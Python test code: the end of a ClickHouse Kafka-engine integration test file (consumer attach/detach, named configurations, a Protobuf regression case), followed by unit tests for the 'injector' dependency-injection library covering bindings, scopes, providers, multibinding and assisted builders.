        CREATE MATERIALIZED VIEW test.kafka_mv TO test.destination AS
        SELECT key, value, 'kafka' as _consumed_by
        FROM test.kafka;

        CREATE MATERIALIZED VIEW test.kafka2_mv TO test.destination AS
        SELECT key, value, 'kafka2' as _consumed_by
        FROM test.kafka2;

        CREATE MATERIALIZED VIEW test.kafka3_mv TO test.destination AS
        SELECT key, value, 'kafka3' as _consumed_by
        FROM test.kafka3;
        ''')

    # Use the kafka_cluster fixture (not the module-level `cluster` global) so
    # the port always matches the cluster this test was invoked with.
    producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)

    def produce_to_both_partitions(key):
        # One message per partition so every live consumer sees new data.
        for partition in (0, 1):
            producer.send(topic=topic_name, value=json.dumps({'key': key, 'value': key}), partition=partition)
        producer.flush()

    ## all 3 attached, 2 working
    produce_to_both_partitions(1)
    prev_count = wait_for_new_data('test.destination')

    ## 2 attached, 2 working
    instance.query('DETACH TABLE test.kafka')
    produce_to_both_partitions(2)
    prev_count = wait_for_new_data('test.destination', prev_count)

    ## 1 attached, 1 working
    instance.query('DETACH TABLE test.kafka2')
    produce_to_both_partitions(3)
    prev_count = wait_for_new_data('test.destination', prev_count)

    ## 2 attached, 2 working
    instance.query('ATTACH TABLE test.kafka')
    produce_to_both_partitions(4)
    prev_count = wait_for_new_data('test.destination', prev_count)

    ## 1 attached, 1 working
    instance.query('DETACH TABLE test.kafka3')
    produce_to_both_partitions(5)
    prev_count = wait_for_new_data('test.destination', prev_count)

    ## 2 attached, 2 working
    instance.query('ATTACH TABLE test.kafka2')
    produce_to_both_partitions(6)
    prev_count = wait_for_new_data('test.destination', prev_count)

    ## 3 attached, 2 working
    instance.query('ATTACH TABLE test.kafka3')
    produce_to_both_partitions(7)
    prev_count = wait_for_new_data('test.destination', prev_count)

    ## 2 attached, same 2 working
    instance.query('DETACH TABLE test.kafka3')
    produce_to_both_partitions(8)
    prev_count = wait_for_new_data('test.destination', prev_count)

    kafka_delete_topic(admin_client, topic_name)
def test_kafka_predefined_configuration(kafka_cluster):
    """Kafka engine must pick up broker/topic/group from the named
    configuration collection ``kafka1``, with only the format given inline."""
    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
    topic_name = 'conf'
    kafka_create_topic(admin_client, topic_name)

    messages = []
    for i in range(50):
        messages.append('{i}, {i}'.format(i=i))
    kafka_produce(kafka_cluster, topic_name, messages)

    instance.query(f'''
        CREATE TABLE test.kafka (key UInt64, value UInt64) ENGINE = Kafka(kafka1, kafka_format='CSV');
        ''')

    result = ''
    while True:
        result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
        if kafka_check_result(result):
            break
    kafka_check_result(result, True)
    # Clean up like the sibling tests do, so a rerun doesn't see stale data.
    kafka_delete_topic(admin_client, topic_name)
# https://github.com/ClickHouse/ClickHouse/issues/26643
def test_issue26643(kafka_cluster):
    """Regression test for ClickHouse#26643: length-delimited Protobuf records
    containing repeated sub-messages and missing optional fields must be
    consumed without breaking the Kafka engine."""
    # for backporting:
    # admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
    producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)

    topic_list = []
    topic_list.append(NewTopic(name="test_issue26643", num_partitions=4, replication_factor=1))
    admin_client.create_topics(new_topics=topic_list, validate_only=False)

    # Fully populated message.  NOTE: `clien` (not `client`) is the field name
    # in the test .proto schema, so the table's `client` column stays empty.
    msg = message_with_repeated_pb2.Message(
        tnow=1629000000,
        server='server1',
        clien='host1',
        sPort=443,
        cPort=50000,
        r=[
            message_with_repeated_pb2.dd(name='1', type=444, ttl=123123, data=b'adsfasd'),
            message_with_repeated_pb2.dd(name='2')
        ],
        method='GET'
    )
    data = b''
    serialized_msg = msg.SerializeToString()
    # Varint length prefix + payload: the framing kafka_format='Protobuf' expects.
    data = data + _VarintBytes(len(serialized_msg)) + serialized_msg

    # Second, nearly empty message appended to the same Kafka record.
    msg = message_with_repeated_pb2.Message(
        tnow=1629000002
    )
    serialized_msg = msg.SerializeToString()
    data = data + _VarintBytes(len(serialized_msg)) + serialized_msg

    producer.send(topic="test_issue26643", value=data)

    # The nearly-empty message once more, as a standalone Kafka record.
    data = _VarintBytes(len(serialized_msg)) + serialized_msg
    producer.send(topic="test_issue26643", value=data)
    producer.flush()

    instance.query('''
        CREATE TABLE IF NOT EXISTS test.test_queue
        (
            `tnow` UInt32,
            `server` String,
            `client` String,
            `sPort` UInt16,
            `cPort` UInt16,
            `r.name` Array(String),
            `r.class` Array(UInt16),
            `r.type` Array(UInt16),
            `r.ttl` Array(UInt32),
            `r.data` Array(String),
            `method` String
        )
        ENGINE = Kafka
        SETTINGS
            kafka_broker_list = 'kafka1:19092',
            kafka_topic_list = 'test_issue26643',
            kafka_group_name = 'test_issue26643_group',
            kafka_format = 'Protobuf',
            kafka_schema = 'message_with_repeated.proto:Message',
            kafka_num_consumers = 4,
            kafka_skip_broken_messages = 10000;

        SET allow_suspicious_low_cardinality_types=1;

        CREATE TABLE test.log
        (
            `tnow` DateTime('Asia/Istanbul') CODEC(DoubleDelta, LZ4),
            `server` LowCardinality(String),
            `client` LowCardinality(String),
            `sPort` LowCardinality(UInt16),
            `cPort` UInt16 CODEC(T64, LZ4),
            `r.name` Array(String),
            `r.class` Array(LowCardinality(UInt16)),
            `r.type` Array(LowCardinality(UInt16)),
            `r.ttl` Array(LowCardinality(UInt32)),
            `r.data` Array(String),
            `method` LowCardinality(String)
        )
        ENGINE = MergeTree
        PARTITION BY toYYYYMMDD(tnow)
        ORDER BY (tnow, server)
        TTL toDate(tnow) + toIntervalMonth(1000)
        SETTINGS index_granularity = 16384, merge_with_ttl_timeout = 7200;

        CREATE MATERIALIZED VIEW test.test_consumer TO test.log AS
        SELECT
            toDateTime(a.tnow) AS tnow,
            a.server AS server,
            a.client AS client,
            a.sPort AS sPort,
            a.cPort AS cPort,
            a.`r.name` AS `r.name`,
            a.`r.class` AS `r.class`,
            a.`r.type` AS `r.type`,
            a.`r.ttl` AS `r.ttl`,
            a.`r.data` AS `r.data`,
            a.method AS method
        FROM test.test_queue AS a;
        ''')

    instance.wait_for_log_line("Committed offset")
    result = instance.query('SELECT * FROM test.log')
    # Columns left unset in the protobuf come back as defaults / empty strings.
    expected = '''\
2021-08-15 07:00:00	server1		443	50000	['1','2']	[0,0]	[444,0]	[123123,0]	['adsfasd','']	GET
2021-08-15 07:00:02			0	0	[]	[]	[]	[]	[]	
2021-08-15 07:00:02			0	0	[]	[]	[]	[]	[]	
'''
    assert TSV(result) == TSV(expected)

    # kafka_cluster.open_bash_shell('instance')
if __name__ == '__main__':
    # Manual debugging entry point: bring the cluster up and keep it alive
    # until a key is pressed, so the containers can be inspected interactively.
    cluster.start()
    input("Cluster created, press any key to destroy...")
    cluster.shutdown()
|
injector_test.py | # encoding: utf-8
#
# Copyright (C) 2010 Alec Thomas <alec@swapoff.org>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# Author: Alec Thomas <alec@swapoff.org>
"""Functional tests for the "Injector" dependency injection framework."""
from contextlib import contextmanager
from typing import Any, NewType
import abc
import sys
import threading
import traceback
import warnings
from typing import Dict, List, NewType
import pytest
from injector import (
Binder,
CallError,
Injector,
Scope,
InstanceProvider,
ClassProvider,
get_bindings,
inject,
multiprovider,
noninjectable,
singleton,
threadlocal,
UnsatisfiedRequirement,
CircularDependency,
Module,
SingletonScope,
ScopeDecorator,
AssistedBuilder,
provider,
ProviderOf,
ClassAssistedBuilder,
Error,
UnknownArgument,
HAVE_ANNOTATED,
)
if HAVE_ANNOTATED:
from injector import Inject, NoInject
def prepare_basic_injection():
    """Return a pair of classes (A, B) where A @inject-depends on B.

    A.__init__'s docstring is asserted verbatim by another test; keep it.
    """
    class B:
        pass

    class A:
        @inject
        def __init__(self, b: B):
            """Construct a new A."""
            self.b = b

    return A, B
def prepare_nested_injectors():
    """Return (parent, child) injectors where the parent binds str -> 'asd'."""
    def bind_str(binder):
        binder.bind(str, to='asd')

    root = Injector(bind_str)
    return root, root.create_child_injector()
def check_exception_contains_stuff(exception, stuff):
    """Assert that str(exception) mentions every item of ``stuff``."""
    text = str(exception)
    for item in stuff:
        message = '%r should be present in the exception representation: %s' % (item, text)
        assert item in text, message
def test_child_injector_inherits_parent_bindings():
    """A child injector resolves bindings configured on its parent."""
    parent, child = prepare_nested_injectors()

    assert child.get(str) == parent.get(str)
def test_child_injector_overrides_parent_bindings():
    """A binding on the child shadows the parent's binding for the same key."""
    parent, child = prepare_nested_injectors()
    child.binder.bind(str, to='qwe')

    assert (parent.get(str), child.get(str)) == ('asd', 'qwe')
def test_child_injector_rebinds_arguments_for_parent_scope():
    """Arguments of a parent-bound injectable are re-resolved with child bindings."""
    class Cls:
        val = ""

    class A(Cls):
        @inject
        def __init__(self, val: str):
            self.val = val

    def configure_parent(binder):
        binder.bind(Cls, to=A)
        binder.bind(str, to="Parent")

    def configure_child(binder):
        binder.bind(str, to="Child")

    parent = Injector(configure_parent)
    assert parent.get(Cls).val == "Parent"
    child = parent.create_child_injector(configure_child)
    assert child.get(Cls).val == "Child"
def test_scopes_are_only_bound_to_root_injector():
    """Singleton scope lives on the root injector, so parent and child share instances."""
    parent, child = prepare_nested_injectors()

    class A:
        pass

    parent.binder.bind(A, to=A, scope=singleton)
    assert parent.get(A) is child.get(A)
def test_get_default_injected_instances():
    """Injector and Binder are implicitly bound to the injector's own instances."""
    A, B = prepare_basic_injection()

    def configure(binder):
        binder.bind(A)
        binder.bind(B)

    injector = Injector(configure)
    assert injector.get(Injector) is injector
    assert injector.get(Binder) is injector.binder
def test_instantiate_injected_method():
    """An @inject-decorated __init__ can still be called directly with explicit args."""
    A, _ = prepare_basic_injection()
    a = A('Bob')
    assert a.b == 'Bob'
def test_method_decorator_is_wrapped():
    """@inject preserves the wrapped method's __doc__ and __name__."""
    A, _ = prepare_basic_injection()
    assert A.__init__.__doc__ == 'Construct a new A.'
    assert A.__init__.__name__ == '__init__'
def test_decorator_works_for_function_with_no_args():
    """@inject must not choke on a function taking only *args/**kwargs."""
    @inject
    def wrapped(*args, **kwargs):
        pass
def test_providers_arent_called_for_dependencies_that_are_already_provided():
    """AssistedBuilder only invokes providers for arguments the caller omits."""
    def configure(binder):
        # Deliberately explosive provider: calling it raises ZeroDivisionError.
        binder.bind(int, to=lambda: 1 / 0)

    class A:
        @inject
        def __init__(self, i: int):
            pass

    injector = Injector(configure)
    builder = injector.get(AssistedBuilder[A])

    # Without an explicit value the exploding provider is triggered...
    with pytest.raises(ZeroDivisionError):
        builder.build()
    # ...but supplying the dependency explicitly bypasses the provider.
    builder.build(i=3)
def test_inject_direct():
    """Basic resolution: getting A also constructs and injects its dependency B."""
    A, B = prepare_basic_injection()

    def configure(binder):
        binder.bind(A)
        binder.bind(B)

    injector = Injector(configure)
    a = injector.get(A)
    assert isinstance(a, A)
    assert isinstance(a.b, B)
def test_configure_multiple_modules():
    """Injector accepts a list of configuration callables, merging their bindings."""
    A, B = prepare_basic_injection()

    def configure_a(binder):
        binder.bind(A)

    def configure_b(binder):
        binder.bind(B)

    injector = Injector([configure_a, configure_b])
    a = injector.get(A)
    assert isinstance(a, A)
    assert isinstance(a.b, B)
def test_inject_with_missing_dependency():
    """With auto_bind disabled, an unbound dependency raises UnsatisfiedRequirement."""
    A, _ = prepare_basic_injection()

    def configure(binder):
        binder.bind(A)

    injector = Injector(configure, auto_bind=False)
    with pytest.raises(UnsatisfiedRequirement):
        injector.get(A)
def test_inject_named_interface():
    """Annotated constructor parameters are resolved by their declared type."""
    class B:
        pass

    class A:
        @inject
        def __init__(self, b: B):
            self.b = b

    def configure(binder):
        binder.bind(A)
        binder.bind(B)

    injector = Injector(configure)
    a = injector.get(A)
    assert isinstance(a, A)
    assert isinstance(a.b, B)
def prepare_transitive_injection():
    """Return (A, B, C) forming the dependency chain A -> B -> C."""
    class C:
        pass

    class B:
        @inject
        def __init__(self, c: C):
            self.c = c

    class A:
        @inject
        def __init__(self, b: B):
            self.b = b

    return A, B, C
def test_transitive_injection():
    """Dependencies of dependencies are resolved recursively."""
    A, B, C = prepare_transitive_injection()

    def configure(binder):
        binder.bind(A)
        binder.bind(B)
        binder.bind(C)

    injector = Injector(configure)
    a = injector.get(A)
    assert isinstance(a, A)
    assert isinstance(a.b, B)
    assert isinstance(a.b.c, C)
def test_transitive_injection_with_missing_dependency():
    """A missing transitive dependency raises UnsatisfiedRequirement at any depth."""
    A, B, _ = prepare_transitive_injection()

    def configure(binder):
        binder.bind(A)
        binder.bind(B)

    injector = Injector(configure, auto_bind=False)
    with pytest.raises(UnsatisfiedRequirement):
        injector.get(A)
    with pytest.raises(UnsatisfiedRequirement):
        injector.get(B)
def test_inject_singleton():
    """A SingletonScope-bound dependency is shared between independent gets."""
    class B:
        pass

    class A:
        @inject
        def __init__(self, b: B):
            self.b = b

    def configure(binder):
        binder.bind(A)
        binder.bind(B, scope=SingletonScope)

    injector1 = Injector(configure)
    a1 = injector1.get(A)
    a2 = injector1.get(A)
    assert a1.b is a2.b
def test_inject_decorated_singleton_class():
    """The @singleton class decorator behaves like binding with SingletonScope."""
    @singleton
    class B:
        pass

    class A:
        @inject
        def __init__(self, b: B):
            self.b = b

    def configure(binder):
        binder.bind(A)
        binder.bind(B)

    injector1 = Injector(configure)
    a1 = injector1.get(A)
    a2 = injector1.get(A)
    assert a1.b is a2.b
def test_threadlocal():
    """@threadlocal instances are shared within a thread but not across threads."""
    @threadlocal
    class A:
        def __init__(self):
            pass

    def configure(binder):
        binder.bind(A)

    injector = Injector(configure)
    a1 = injector.get(A)
    a2 = injector.get(A)
    assert a1 is a2

    a3 = [None]
    ready = threading.Event()

    def inject_a3():
        # Resolve A on a second thread; should yield a distinct instance.
        a3[0] = injector.get(A)
        ready.set()

    threading.Thread(target=inject_a3).start()
    # Bounded wait so a hung thread can't stall the suite indefinitely.
    ready.wait(1.0)
    assert a2 is not a3[0] and a3[0] is not None
def test_injecting_interface_implementation():
    """Binding Interface -> Implementation injects the implementation."""
    class Interface:
        pass

    class Implementation:
        pass

    class A:
        @inject
        def __init__(self, i: Interface):
            self.i = i

    def configure(binder):
        binder.bind(A)
        binder.bind(Interface, to=Implementation)

    injector = Injector(configure)
    a = injector.get(A)
    assert isinstance(a.i, Implementation)
def test_cyclic_dependencies():
    """A -> Interface(=B) -> A forms a cycle and must raise CircularDependency."""
    class Interface:
        pass

    class A:
        @inject
        def __init__(self, i: Interface):
            self.i = i

    class B:
        @inject
        def __init__(self, a: A):
            self.a = a

    def configure(binder):
        binder.bind(Interface, to=B)
        binder.bind(A)

    injector = Injector(configure)
    with pytest.raises(CircularDependency):
        injector.get(A)
def test_dependency_cycle_can_be_worked_broken_by_assisted_building():
    """AssistedBuilder defers construction, which breaks the A <-> B cycle."""
    class Interface:
        pass

    class A:
        @inject
        def __init__(self, i: Interface):
            self.i = i

    class B:
        @inject
        def __init__(self, a_builder: AssistedBuilder[A]):
            self.a = a_builder.build(i=self)

    def configure(binder):
        binder.bind(Interface, to=B)
        binder.bind(A)

    injector = Injector(configure)

    # Previously it'd detect a circular dependency here:
    # 1. Constructing A requires Interface (bound to B)
    # 2. Constructing B requires assisted build of A
    # 3. Constructing A triggers circular dependency check
    assert isinstance(injector.get(A), A)
def test_that_injection_is_lazy():
    """Dependencies are constructed only when the dependent object is requested."""
    class Interface:
        constructed = False  # flipped by __init__ so laziness is observable

        def __init__(self):
            Interface.constructed = True

    class A:
        @inject
        def __init__(self, i: Interface):
            self.i = i

    def configure(binder):
        binder.bind(Interface)
        binder.bind(A)

    injector = Injector(configure)
    assert not (Interface.constructed)
    injector.get(A)
    assert Interface.constructed
def test_module_provider():
    """A @provider method on a Module supplies the binding for its return type."""
    class MyModule(Module):
        @provider
        def provide_name(self) -> str:
            return 'Bob'

    module = MyModule()
    injector = Injector(module)
    assert injector.get(str) == 'Bob'
def test_module_class_gets_instantiated():
    """Passing a Module *class* (not an instance) to Injector instantiates it."""
    name = 'Meg'

    class MyModule(Module):
        def configure(self, binder):
            binder.bind(str, to=name)

    injector = Injector(MyModule)
    assert injector.get(str) == name
def test_inject_and_provide_coexist_happily():
    """A @provider method may itself be @inject-ed with other provided values."""
    class MyModule(Module):
        @provider
        def provide_weight(self) -> float:
            return 50.0

        @provider
        def provide_age(self) -> int:
            return 25

        # TODO(alec) Make provider/inject order independent.
        @provider
        @inject
        def provide_description(self, age: int, weight: float) -> str:
            return 'Bob is %d and weighs %0.1fkg' % (age, weight)

    assert Injector(MyModule()).get(str) == 'Bob is 25 and weighs 50.0kg'
def test_multibind():
    """multibind/multiprovider contributions for one key are concatenated/merged.

    Covers plain List/Dict keys, differently-parameterized List/Dict keys, and
    NewType aliases, combined from explicit multibind() calls and
    @multiprovider module methods.
    """
    Names = NewType('Names', List[str])
    # Fix: the alias's declared name used to be 'Ages', mismatching the
    # variable and the sibling test below. The name is informational only,
    # so this is behavior-preserving.
    Passwords = NewType('Passwords', Dict[str, str])

    # First let's have some explicit multibindings
    def configure(binder):
        binder.multibind(List[str], to=['not a name'])
        binder.multibind(Dict[str, str], to={'asd': 'qwe'})
        # To make sure Lists and Dicts of different subtypes are treated distinctly
        binder.multibind(List[int], to=[1, 2, 3])
        binder.multibind(Dict[str, int], to={'weight': 12})
        # To see that NewTypes are treated distinctly
        binder.multibind(Names, to=['Bob'])
        binder.multibind(Passwords, to={'Bob': 'password1'})

    # Then @multiprovider-decorated Module methods
    class CustomModule(Module):
        @multiprovider
        def provide_some_ints(self) -> List[int]:
            return [4, 5, 6]

        @multiprovider
        def provide_some_strs(self) -> List[str]:
            return ['not a name either']

        @multiprovider
        def provide_str_to_str_mapping(self) -> Dict[str, str]:
            return {'xxx': 'yyy'}

        @multiprovider
        def provide_str_to_int_mapping(self) -> Dict[str, int]:
            return {'height': 33}

        @multiprovider
        def provide_names(self) -> Names:
            return ['Alice', 'Clarice']

        @multiprovider
        def provide_passwords(self) -> Passwords:
            return {'Alice': 'aojrioeg3', 'Clarice': 'clarice30'}

    injector = Injector([configure, CustomModule])
    assert injector.get(List[str]) == ['not a name', 'not a name either']
    assert injector.get(List[int]) == [1, 2, 3, 4, 5, 6]
    assert injector.get(Dict[str, str]) == {'asd': 'qwe', 'xxx': 'yyy'}
    assert injector.get(Dict[str, int]) == {'weight': 12, 'height': 33}
    assert injector.get(Names) == ['Bob', 'Alice', 'Clarice']
    assert injector.get(Passwords) == {'Bob': 'password1', 'Alice': 'aojrioeg3', 'Clarice': 'clarice30'}
def test_regular_bind_and_provider_dont_work_with_multibind():
    """Plain bind()/@provider must be rejected for multibinding keys."""
    # We only want multibind and multiprovider to work to avoid confusion
    Names = NewType('Names', List[str])
    Passwords = NewType('Passwords', Dict[str, str])

    class MyModule(Module):
        # Each @provider declaration for a multibind-style key must raise
        # immediately, at class-definition time.
        with pytest.raises(Error):

            @provider
            def provide_strs(self) -> List[str]:
                return []

        with pytest.raises(Error):

            @provider
            def provide_names(self) -> Names:
                return []

        with pytest.raises(Error):

            @provider
            def provide_strs_in_dict(self) -> Dict[str, str]:
                return {}

        with pytest.raises(Error):

            @provider
            def provide_passwords(self) -> Passwords:
                return {}

    injector = Injector()
    binder = injector.binder

    with pytest.raises(Error):
        binder.bind(List[str], to=[])
    with pytest.raises(Error):
        binder.bind(Names, to=[])
    with pytest.raises(Error):
        binder.bind(Dict[str, str], to={})
    with pytest.raises(Error):
        binder.bind(Passwords, to={})
def test_auto_bind():
    """With auto_bind (the default) unbound classes are constructible anyway."""
    class A:
        pass

    injector = Injector()
    assert isinstance(injector.get(A), A)
def test_auto_bind_with_newtype():
    """Auto-binding also resolves a NewType alias to its underlying class."""
    # Reported in https://github.com/alecthomas/injector/issues/117
    class A:
        pass

    AliasOfA = NewType('AliasOfA', A)
    injector = Injector()
    assert isinstance(injector.get(AliasOfA), A)
def test_custom_scope():
    """A user-defined request-style Scope controls when bindings are satisfiable."""
    class RequestScope(Scope):
        # The scope is active only inside the `with scope(request)` block;
        # outside it, scoped keys raise UnsatisfiedRequirement.
        def configure(self):
            self.context = None

        @contextmanager
        def __call__(self, request):
            assert self.context is None
            self.context = {}
            binder = self.injector.get(Binder)
            binder.bind(Request, to=request, scope=RequestScope)
            yield
            self.context = None

        def get(self, key, provider):
            if self.context is None:
                raise UnsatisfiedRequirement(None, key)
            try:
                return self.context[key]
            except KeyError:
                # First request within this scope: memoize as an InstanceProvider.
                provider = InstanceProvider(provider.get(self.injector))
                self.context[key] = provider
                return provider

    request = ScopeDecorator(RequestScope)

    class Request:
        pass

    @request
    class Handler:
        def __init__(self, request):
            self.request = request

    class RequestModule(Module):
        @provider
        @inject
        def handler(self, request: Request) -> Handler:
            return Handler(request)

    injector = Injector([RequestModule()], auto_bind=False)

    # Outside an active scope the Handler cannot be satisfied.
    with pytest.raises(UnsatisfiedRequirement):
        injector.get(Handler)

    scope = injector.get(RequestScope)
    request = Request()
    with scope(request):
        handler = injector.get(Handler)
        assert handler.request is request

    # Scope exited: unsatisfiable again.
    with pytest.raises(UnsatisfiedRequirement):
        injector.get(Handler)
def test_binder_install():
    """binder.install() pulls in the bindings of another module."""
    class ModuleA(Module):
        def configure(self, binder):
            binder.bind(str, to='hello world')

    class ModuleB(Module):
        def configure(self, binder):
            binder.install(ModuleA())

    injector = Injector([ModuleB()])
    assert injector.get(str) == 'hello world'
def test_binder_provider_for_method_with_explicit_provider():
    container = Injector()
    p = container.binder.provider_for(int, to=InstanceProvider(1))
    assert type(p) is InstanceProvider
    assert p.get(container) == 1


def test_binder_provider_for_method_with_instance():
    container = Injector()
    p = container.binder.provider_for(int, to=1)
    assert type(p) is InstanceProvider
    assert p.get(container) == 1


def test_binder_provider_for_method_with_class():
    container = Injector()
    p = container.binder.provider_for(int)
    assert type(p) is ClassProvider
    assert p.get(container) == 0


def test_binder_provider_for_method_with_class_to_specific_subclass():
    class A:
        pass

    class B(A):
        pass

    container = Injector()
    p = container.binder.provider_for(A, B)
    assert type(p) is ClassProvider
    assert isinstance(p.get(container), B)


def test_binder_provider_for_type_with_metaclass():
    # Create a class with a metaclass in a python2/3-portable way;
    # equivalent to: class A(object, metaclass=abc.ABCMeta): pass
    A = abc.ABCMeta('A', (object,), {})
    container = Injector()
    assert isinstance(container.binder.provider_for(A, None).get(container), A)
def test_injecting_undecorated_class_with_missing_dependencies_raises_the_right_error():
    """ClassA's __init__ is not decorated with @inject, so building ClassB
    (which depends on ClassA) must fail with a CallError naming both the
    failing constructor and the requesting class.
    """
    class ClassA:
        def __init__(self, parameter):
            pass

    class ClassB:
        @inject
        def __init__(self, a: ClassA):
            pass

    injector = Injector()
    # BUG FIX: the original try/except silently passed when no exception was
    # raised at all; pytest.raises makes a missing CallError a test failure.
    with pytest.raises(CallError) as excinfo:
        injector.get(ClassB)
    check_exception_contains_stuff(excinfo.value, ('ClassA.__init__', 'ClassB'))
def test_call_to_method_with_legitimate_call_error_raises_type_error():
    class A:
        def __init__(self):
            max()  # TypeError: max expected at least 1 argument

    with pytest.raises(TypeError):
        Injector().get(A)
def test_call_error_str_representation_handles_single_arg():
    error = CallError('zxc')
    assert str(error) == 'zxc'
class NeedsAssistance:
    """Has one injectable (a) and one assisted (b) constructor argument."""

    @inject
    def __init__(self, a: str, b):
        self.a = a
        self.b = b


def test_assisted_builder_works_when_got_directly_from_injector():
    builder = Injector().get(AssistedBuilder[NeedsAssistance])
    instance = builder.build(b=123)
    assert (instance.a, instance.b) == (str(), 123)


def test_assisted_builder_works_when_injected():
    class X:
        @inject
        def __init__(self, builder: AssistedBuilder[NeedsAssistance]):
            self.obj = builder.build(b=234)

    x = Injector().get(X)
    assert (x.obj.a, x.obj.b) == (str(), 234)


def test_assisted_builder_uses_bindings():
    class Interface:
        b = 0

    def configure(binder):
        binder.bind(Interface, to=NeedsAssistance)

    builder = Injector(configure).get(AssistedBuilder[Interface])
    built = builder.build(b=333)
    assert (type(built), built.b) == (NeedsAssistance, 333)


def test_assisted_builder_uses_concrete_class_when_specified():
    class X:
        pass

    def configure(binder):
        # meant only to show that provider isn't called
        binder.bind(X, to=lambda: 1 / 0)

    Injector(configure).get(ClassAssistedBuilder[X]).build()


def test_assisted_builder_injection_is_safe_to_use_with_multiple_injectors():
    class X:
        @inject
        def __init__(self, builder: AssistedBuilder[NeedsAssistance]):
            self.builder = builder

    first, second = Injector(), Injector()
    b1 = first.get(X).builder
    b2 = second.get(X).builder
    assert (b1._injector, b2._injector) == (first, second)
class TestThreadSafety:
    """Injection and singleton creation must be safe under concurrent use."""

    def setup(self):
        self.event = threading.Event()

        # The str provider blocks until the event is set, so all worker
        # threads pile up inside injection at the same time.
        def configure(binder):
            binder.bind(str, to=lambda: self.event.wait() and 'this is str')

        class XXX:
            @inject
            def __init__(self, s: str):
                pass

        self.injector = Injector(configure)
        self.cls = XXX

    def gather_results(self, count):
        # Start `count` threads that all request self.cls concurrently,
        # release them together, and return the created objects.
        objects = []
        lock = threading.Lock()

        def target():
            o = self.injector.get(self.cls)
            with lock:
                objects.append(o)

        threads = [threading.Thread(target=target) for i in range(count)]
        for t in threads:
            t.start()
        self.event.set()
        for t in threads:
            t.join()
        return objects

    def test_injection_is_thread_safe(self):
        objects = self.gather_results(2)
        assert len(objects) == 2

    def test_singleton_scope_is_thread_safe(self):
        self.injector.binder.bind(self.cls, scope=singleton)
        a, b = self.gather_results(2)
        assert a is b
def test_provider_and_scope_decorator_collaboration():
    @provider
    @singleton
    def provider_singleton() -> int:
        return 10

    @singleton
    @provider
    def singleton_provider() -> int:
        return 10

    # The order of the two decorators must not matter.
    assert provider_singleton.__binding__.scope == SingletonScope
    assert singleton_provider.__binding__.scope == SingletonScope


def test_injecting_into_method_of_object_that_is_falseish_works():
    # regression test: an empty dict subclass instance is falsy
    class X(dict):
        @inject
        def __init__(self, s: str):
            pass

    Injector().get(X)


def test_callable_provider_injection():
    Name = NewType("Name", str)
    Message = NewType("Message", str)

    @inject
    def create_message(name: Name):
        return "Hello, " + name

    def configure(binder):
        binder.bind(Name, to="John")
        binder.bind(Message, to=create_message)

    assert Injector([configure]).get(Message) == "Hello, John"
def test_providerof():
    counter = [0]

    def provide_str():
        counter[0] += 1
        return 'content'

    def configure(binder):
        binder.bind(str, to=provide_str)

    injector = Injector(configure)
    assert counter[0] == 0
    str_provider = injector.get(ProviderOf[str])
    # Obtaining the ProviderOf wrapper must not invoke the provider.
    assert counter[0] == 0
    assert str_provider.get() == 'content'
    assert counter[0] == 1
    assert str_provider.get() == injector.get(str)
    # Both sides of the comparison above ran provide_str once more.
    assert counter[0] == 3


def test_providerof_cannot_be_bound():
    def configure(binder):
        binder.bind(ProviderOf[int], to=InstanceProvider(None))

    with pytest.raises(Exception):
        Injector(configure)


def test_providerof_is_safe_to_use_with_multiple_injectors():
    def configure1(binder):
        binder.bind(int, to=1)

    def configure2(binder):
        binder.bind(int, to=2)

    key = ProviderOf[int]
    assert Injector(configure1).get(key).get() == 1
    assert Injector(configure2).get(key).get() == 2
def test_special_interfaces_work_with_auto_bind_disabled():
    class InjectMe:
        pass

    def configure(binder):
        binder.bind(InjectMe, to=InstanceProvider(InjectMe()))

    injector = Injector(configure, auto_bind=False)
    # Regression: with auto_bind disabled, requesting ProviderOf[...] used
    # to raise UnsatisfiedRequirement from Binder.get_binding.
    injector.get(ProviderOf[InjectMe])
    # ClassAssistedBuilder used to fail with a similar error.
    injector.get(ClassAssistedBuilder[InjectMe])


def test_binding_an_instance_regression():
    text = b'hello'.decode()

    def configure(binder):
        # Yes, this binding doesn't make sense strictly speaking but
        # it's just a sample case.
        binder.bind(bytes, to=text)

    # This used to return empty bytes instead of the expected string.
    assert Injector(configure).get(bytes) == text
def test_class_assisted_builder_of_partially_injected_class_old():
    class A:
        pass

    class B:
        @inject
        def __init__(self, a: A, b: str):
            self.a = a
            self.b = b

    class C:
        @inject
        def __init__(self, a: A, builder: ClassAssistedBuilder[B]):
            self.a = a
            self.b = builder.build(b='C')

    instance = Injector().get(C)
    assert isinstance(instance, C)
    assert isinstance(instance.b, B)
    assert isinstance(instance.b.a, A)


def test_implicit_injection_for_python3():
    class A:
        pass

    class B:
        @inject
        def __init__(self, a: A):
            self.a = a

    class C:
        @inject
        def __init__(self, b: B):
            self.b = b

    instance = Injector().get(C)
    assert isinstance(instance, C)
    assert isinstance(instance.b, B)
    assert isinstance(instance.b.a, A)
def test_annotation_based_injection_works_in_provider_methods():
    class MyModule(Module):
        def configure(self, binder):
            binder.bind(int, to=42)

        @provider
        def provide_str(self, i: int) -> str:
            return str(i)

        @singleton
        @provider
        def provide_object(self) -> object:
            return object()

    container = Injector(MyModule)
    assert container.get(str) == '42'
    assert container.get(object) is container.get(object)


def test_assisted_building_is_supported():
    class Fetcher:
        def fetch(self, user_id):
            assert user_id == 333
            return {'name': 'John'}

    class Processor:
        @noninjectable('provider_id')
        @inject
        @noninjectable('user_id')
        def __init__(self, fetcher: Fetcher, user_id: int, provider_id: str):
            assert provider_id == 'not injected'
            data = fetcher.fetch(user_id)
            self.name = data['name']

    def configure(binder):
        binder.bind(int, to=897)
        binder.bind(str, to='injected')

    builder = Injector(configure).get(AssistedBuilder[Processor])
    # Without the noninjectable arguments, building must fail...
    with pytest.raises(CallError):
        builder.build()
    # ...and succeed once they are supplied explicitly.
    processor = builder.build(user_id=333, provider_id='not injected')
    assert processor.name == 'John'
def test_raises_when_noninjectable_arguments_defined_with_invalid_arguments():
